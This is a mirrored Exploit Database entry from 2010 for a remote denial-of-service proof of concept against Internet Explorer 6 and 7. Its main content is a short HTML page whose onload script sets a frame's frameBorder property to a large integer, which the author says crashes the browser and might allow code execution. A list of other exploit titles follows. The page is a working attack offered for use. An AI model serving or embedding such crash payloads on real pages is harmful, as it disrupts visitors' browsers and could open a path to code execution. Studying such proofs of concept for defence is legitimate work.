Microsoft Internet Explorer 6/7 – Remote Denial of Service

Exploit Database
8 阅读

作者： Richard leahy

日期： 2010-07-27
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/14484/

# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.

# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder 
causing a dos and may lead to code execution. 

#code

<html>
<head>
<script>

function dos(){

var e = document.createElement('frame');
var prop = 'frameBorder';

e[prop] = 0123456789;
}

</script>
</head>
<body onload="dos()">
</body>

</html>
 		 	 		
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969

last Exploits
Microsoft Internet Explorer 6/7 – Remote Denial of Service的更多信息

Adobe Flash – Stage.align Setter Use-After-Free：
iPhone FTP Server By Zhang Boyang – Remote Denial of Service：
WebKit – Universal XSS in WebCore::command：
Micro Focus Rumba+ 9.4 – Multiple Stack Buffer Overflow Vulnerabilities：
All browsers – Crash：
Fake Webcam 6.1 – Local Crash (PoC)：
libotr 4.1.0 – Memory Corruption：
Inetserv 3.23 – SMTP Denial of Service：